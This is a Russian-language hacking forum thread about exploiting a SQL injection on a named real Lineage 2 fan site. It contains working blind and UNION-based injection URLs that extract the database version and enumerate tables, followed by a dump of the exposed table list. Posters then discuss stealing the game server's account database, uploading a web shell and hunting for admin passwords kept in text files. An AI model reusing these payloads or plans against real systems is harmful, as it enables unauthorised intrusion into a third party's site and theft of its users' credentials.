все таки одна скуля нашлась=) Code: http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),1,1)))=53/* 5 http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),2,1)))=46/* . http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),3,1)))=49/* 1 http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),4,1)))=46/* . http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),5,1)))=49/* 1 http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),6,1)))=54/* 6 http://lineage2.wnet.ua/library/l2dp/item.php?id=2+and(1=(select+1))/* gratz constantine.
А чего так криво)) связка операторов union+select вполне функционирует Code: http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,version()/* Какие то такие запросы будут получаться, инфу вывести не сложно Code: http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,column_name+from+information_schema.columns+where+table_name=0x4e7063496e666f/*
тока никто не учёл такую вещь как user()=L2db@localhost => доступные таблицы это тока те которые относятся к справочной базе=\ Code: CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES ENGINES EVENTS FILES GLOBAL_STATUS GLOBAL_VARIABLES KEY_COLUMN_USAGE PARTITIONS PLUGINS PROCESSLIST REFERENTIAL_CONSTRAINTS ROUTINES SCHEMATA SCHEMA_PRIVILEGES SESSION_STATUS SESSION_VARIABLES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS Armor ClassStats Classes DropLog Drops Dropsl2db EtcItems GainSkills GainSkillsLog IngredientLog Ingredients Ingredientsl2db ItemNames Items Locations Monsters NpcInfo NpcLog NpcNames QuestDetailLog QuestDetails QuestLog QuestNames Quests RecipeLog Recipes Recipesl2db SetItems Sets SkillNames Skills Stores SysStrings Teleports Weapons
если реч идет о слити данных об акках которые стоят на етом сервере,то я незнаю как етот сервак но я много серваков ставил(у себя на компе)))и все они были на mysql и вобще с чего вы взяли что базы етого сервака будут на етом сайте???сервак то наверняка стоит у них на компе...
Офф на МайСкюл? какие серваки ты ставил? может явы... внет считается одним из топ УА сервов ла2... то что там БД не Мумкул (от серва) гарантирую +Гмы не настолько там тупы (с виду =))) ) было у мну дело тоже с оффом вроде все было и уже пассы и доступ... скрипта на "легкое слитие бд" небыло с МССКЮЛОМ не дружил (увы (( ) да и щас не дружу... так слить базу пассов не удалось... база с сервом стоят в офисе (хз что и как настроено) теоретически можно попробовать какимто раком залить шелл (не судите строго не оч разбираюсь) там уже в конфигурациях или даже просто в файлах (админы любят пассы хранить в текстовиках на роб. столе) узнать все пассы (доступ, назв. баз и тд) ну а там думать ) строго не судите пост 02.00
да ты прав я ставил ява серваки...но етот сервак 100% не офф так что база наверняка в мускуле...и если вся база о аккуантах тоже наверняка храниться у них на компе...так что если хотите слить базу нужно пытаться конектиться к кмопу или че то типа етого(я просто представления не имею как ето сделать...)=)т.к. на сайте об базах сервака точно ни че нету
слуш почему ты так уверен что это ява то? ) вот сколько лет уже его почемуто оффом называют... я говорю не к тому чтоб обидеть или еще что-то но просто внет явой быть ну никак не может... и ставил его поверь мне не ребенок, серв профисиональный, явы так обычно не работают много показателей... хотя хз они недавно переезжали вроде, в общем просто хотелось бы услышать почему он ява... просто все время считал его оффом... сомневаюсь очень крайне что он на мускуле... ты хоть раз ставил офф? еще раз вопрос - откуда такие сравнения? ---
Офф на каждом втором серваке сейчас стоит, слили все, кому не лень По поводу базы: да, в офф-версиях используется Mssql, причем адрес игрового сервера редко совпадает с адресом сервера, где находится/хостится сайт.
таки да но... теоретически залив шелл все равно можно найти данные о серве и БД самой игры... но достаточно геморно...
